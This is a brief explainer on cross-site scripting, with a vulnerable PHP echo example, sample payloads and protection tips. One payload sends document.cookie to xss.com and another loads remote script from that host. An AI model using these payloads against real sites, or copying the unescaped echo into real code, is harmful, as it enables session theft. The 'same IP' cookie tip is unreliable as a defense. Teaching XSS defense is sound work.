Cross Site Scripting (XSS)

Definition: http://en.wikipedia.org/wiki/Cross-site_scripting

XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.

Example:

<?php echo $_POST[‘name’]; ?>

Examples of XSS exploits:

<script>alert('xss')</script>

<script>new Image().src=’http://xss.com/xss.php?cookies=’+encodeURI(document.cookie)</script>

<script src=”http://xss.com/xss.js”></script>

Protection:

– Validate the input

– Escape the input / output

<?php echo htmlentities($_POST[‘name’], ENT_QUOTES, ‘UTF-8’);?>

– Only allow the same IP to access the cookie